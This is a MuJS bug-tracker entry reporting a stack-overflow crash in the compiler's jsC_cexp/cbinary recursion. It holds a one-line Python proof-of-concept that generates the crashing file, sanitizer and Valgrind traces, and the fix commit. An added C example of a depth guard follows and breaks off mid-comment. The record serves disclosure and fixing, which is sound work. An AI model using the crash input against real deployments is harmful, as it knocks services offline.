Bug 698868 - DoS caused by the interactive call between two functions
Summary: DoS caused by the interactive call between two functions
Status: RESOLVED FIXED
Alias: None
Product: MuJS
Classification: Unclassified
Component: general
Version: unspecified
Hardware: PC Linux
Importance: P1 blocker
Assignee: Tor Andersson
QA Contact: Bug traffic
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-01-16 15:31 UTC by invictus1306
Modified: 2019-05-08 13:53 UTC
CC List: 1 user

See Also:
Customer:
Word Size: ---


Attachments
poc file (468.75 KB, application/javascript)
2018-01-17 00:49 UTC, invictus1306

Description invictus1306 2018-01-16 15:31:28 UTC
The continuous calls between the two functions "jsC_cexp" and "cbinary" allow attackers to cause a denial of service (application crash) via a crafted .js file.

This is the POC file:
# python -c "print('func%d'*80000)" > payload.js

AddressSanitizer report
# ./build/sanitize/mujs payload.js 
ASAN:SIGSEGV
=================================================================
==4677==ERROR: AddressSanitizer: stack-overflow on address 0x7ffec2a9fff8 (pc 0x00000040a58e bp 0x7ffec2aa0030 sp 0x7ffec2a9fff0 T0)
    #0 0x40a58d in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:553
    #1 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #2 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #3 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #4 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #5 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #6 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #7 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #8 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #9 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #10 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #11 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #12 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #13 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #14 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #15 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #16 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #17 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #18 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #19 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #20 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #21 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #22 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #23 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #24 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #25 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #26 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #27 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #28 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #29 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #30 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #31 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #32 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #33 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #34 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #35 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #36 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #37 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #38 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #39 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #40 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #41 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #42 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #43 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #44 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #45 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #46 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #47 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #48 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #49 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #50 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #51 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #52 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #53 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #54 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #55 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #56 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #57 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #58 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #59 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #60 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #61 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #62 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #63 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #64 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #65 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #66 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #67 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #68 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #69 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #70 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #71 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #72 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #73 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #74 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #75 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #76 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #77 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #78 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #79 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #80 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #81 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #82 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #83 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #84 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #85 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #86 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #87 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #88 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #89 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #90 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #91 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #92 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #93 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #94 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #95 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #96 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #97 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #98 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #99 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #100 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #101 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #102 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #103 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #104 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #105 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #106 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #107 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #108 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #109 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #110 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #111 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #112 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #113 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #114 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #115 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #116 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #117 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #118 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #119 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #120 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #121 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #122 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #123 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #124 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #125 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #126 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #127 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #128 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #129 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #130 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #131 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #132 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #133 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #134 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #135 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #136 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #137 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #138 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #139 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #140 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #141 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #142 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #143 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #144 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #145 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #146 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #147 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #148 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #149 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #150 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #151 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #152 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #153 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #154 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #155 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #156 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #157 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #158 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #159 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #160 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #161 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #162 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #163 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #164 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #165 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #166 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #167 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #168 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #169 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #170 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #171 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #172 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #173 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #174 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #175 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #176 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #177 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #178 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #179 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #180 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #181 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #182 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #183 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #184 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #185 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #186 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #187 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #188 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #189 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #190 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #191 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #192 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #193 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #194 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #195 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #196 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #197 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #198 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #199 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #200 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #201 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #202 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #203 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #204 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #205 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #206 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #207 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #208 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #209 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #210 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #211 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #212 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #213 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #214 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #215 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #216 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #217 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #218 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #219 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #220 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #221 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #222 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #223 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #224 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #225 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #226 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #227 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #228 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #229 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #230 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #231 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #232 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #233 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #234 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #235 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #236 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #237 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #238 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #239 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #240 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #241 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #242 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #243 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #244 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #245 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #246 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #247 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #248 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #249 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280
    #250 0x40b295 in jsC_cexp /home/invictus1306/Documents/vulns/mujs/jscompile.c:674
    #251 0x408878 in cbinary /home/invictus1306/Documents/vulns/mujs/jscompile.c:280

Valgrind report
# valgrind ./build/release/mujs payload.js 
==4681== Memcheck, a memory error detector
==4681== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==4681== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
==4681== Command: ./build/release/mujs payload.js
==4681== 
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681== 
==4681== Process terminating with default action of signal 11 (SIGSEGV)
==4681==  Access not within mapped region at address 0xFFE801FC8
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681==    at 0x40F8C0: ??? (in /home/invictus1306/Documents/vulns/mujs/build/release/mujs)
==4681==  If you believe this happened as a result of a stack
==4681==  overflow in your program's main thread (unlikely but
==4681==  possible), you can try to increase the size of the
==4681==  main thread stack using the --main-stacksize= flag.
==4681==  The main thread stack size used in this run was 8388608.
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681== 
==4681== Process terminating with default action of signal 11 (SIGSEGV)
==4681==  Access not within mapped region at address 0xFFE801FC0
==4681== Stack overflow in thread #1: can't grow stack to 0xffe801000
==4681==    at 0x4A28680: _vgnU_freeres (in /usr/lib/valgrind/vgpreload_core-amd64-linux.so)
==4681==  If you believe this happened as a result of a stack
==4681==  overflow in your program's main thread (unlikely but
==4681==  possible), you can try to increase the size of the
==4681==  main thread stack using the --main-stacksize= flag.
==4681==  The main thread stack size used in this run was 8388608.
==4681== 
==4681== HEAP SUMMARY:
==4681==     in use at exit: 14,678,942 bytes in 161,289 blocks
==4681==   total heap usage: 161,391 allocs, 102 frees, 14,687,958 bytes allocated
==4681== 
==4681== LEAK SUMMARY:
==4681==    definitely lost: 0 bytes in 0 blocks
==4681==    indirectly lost: 0 bytes in 0 blocks
==4681==      possibly lost: 0 bytes in 0 blocks
==4681==    still reachable: 14,678,942 bytes in 161,289 blocks
==4681==         suppressed: 0 bytes in 0 blocks
==4681== Rerun with --leak-check=full to see details of leaked memory
==4681== 
==4681== For counts of detected and suppressed errors, rerun with: -v
==4681== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)
Segmentation fault (core dumped)
Comment 1 Ken Sharp 2018-01-17 00:16:52 UTC
Please attach your 'payload.js' file; we can't work on the problem without a specimen file, and there's no guarantee that one we create will match yours.
Comment 2 invictus1306 2018-01-17 00:49:06 UTC
Created attachment 14594 [details]
poc file
Comment 3 invictus1306 2018-01-17 15:45:08 UTC
Hello if you need more info, please ask :)
Comment 4 Tor Andersson 2018-01-24 07:33:06 UTC
Fixed in commit 4d45a96e57fbabf00a7378b337d0ddcace6f38c1
Author: Tor Andersson <tor.andersson@artifex.com>
Date:   Thu Jan 18 14:16:28 2018 +0100

    Guard binary expressions from too much recursion.
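The recursion the ASAN trace shows, and the shape of the fix named in the commit message, as an added example written for this page rather than MuJS's own code. The PoC text "func%dfunc%dfunc%d..." tokenizes as one left-associative chain, `func % dfunc % dfunc % ... % d`, so the parser hands the compiler a tree nested one level per `%` operator, and compiling it through the mutually recursive jsC_cexp/cbinary pair costs a pair of C stack frames per level. The toy below builds that left-nested tree, compiles it with a cexp/cbinary pair of the same shape, and adds a depth guard that reports "too much recursion" instead of descending further. Node, Compiler, build_chain, compile_chain, the chain_* accessors and the MAX_DEPTH value are this example's own assumptions; the page does not state which limit or mechanism commit 4d45a96e actually uses.

```c
/*
 * Added example, not MuJS code: a toy recursive-descent compiler for a
 * left-associative operator chain, showing why `func % dfunc % ... % d`
 * recurses once per operator and how a depth guard stops that. All names
 * here (Node, Compiler, MAX_DEPTH, build_chain, compile_chain, ...) are
 * this example's own; MAX_DEPTH is an assumed value, not MuJS's limit.
 */
#include <stdio.h>
#include <stdlib.h>

#define MAX_DEPTH 100   /* assumed nesting limit for the guarded mode */

typedef struct Node {
    char op;                    /* '%' for a binary node, 0 for an operand */
    struct Node *left, *right;
} Node;

typedef struct {
    int depth_limit;            /* <= 0: unguarded (the vulnerable shape) */
    int max_depth;              /* deepest recursion level reached */
    long ninstr;                /* instructions "emitted" */
    int too_deep;               /* set once the guard refuses to descend */
} Compiler;

static Node *new_node(char op, Node *left, Node *right)
{
    Node *n = calloc(1, sizeof *n);
    if (!n) abort();
    n->op = op; n->left = left; n->right = right;
    return n;
}

/* The tree a parser builds for n operands joined by a left-associative
 * operator: (((x0 % x1) % x2) % ...). Built iteratively so this helper
 * cannot itself overflow the stack. */
static Node *build_chain(int n)
{
    Node *root = new_node(0, NULL, NULL);
    for (int i = 1; i < n; i++)
        root = new_node('%', root, new_node(0, NULL, NULL));
    return root;
}

/* Every right child is an operand, so the tree is freed by walking the
 * left spine iteratively (a recursive free would be just as deep). */
static void free_chain(Node *n)
{
    while (n) {
        Node *left = n->left;
        free(n->right);
        free(n);
        n = left;
    }
}

static void cexp(Compiler *C, const Node *n, int depth);

/* Mirrors the cbinary frame in the trace: compile both operands, then
 * emit the operator. The guard is the only difference between the
 * vulnerable and the fixed shape. */
static void cbinary(Compiler *C, const Node *n, int depth)
{
    if (C->depth_limit > 0 && depth > C->depth_limit) {
        C->too_deep = 1;        /* report "too much recursion", don't recurse */
        return;
    }
    cexp(C, n->left, depth + 1);
    if (C->too_deep) return;
    cexp(C, n->right, depth + 1);
    if (C->too_deep) return;
    C->ninstr++;                /* emit the binary operator */
}

/* Mirrors the jsC_cexp frame: dispatch on node kind. */
static void cexp(Compiler *C, const Node *n, int depth)
{
    if (depth > C->max_depth) C->max_depth = depth;
    if (n->op == '%') cbinary(C, n, depth);
    else C->ninstr++;           /* emit a load of the operand */
}

/* Compile an n-operand chain. Returns 0 on success, -1 when the guard
 * fired. With depth_limit <= 0 the recursion depth is n - 1 and grows
 * without bound with the input, which is how the 80000-operand PoC
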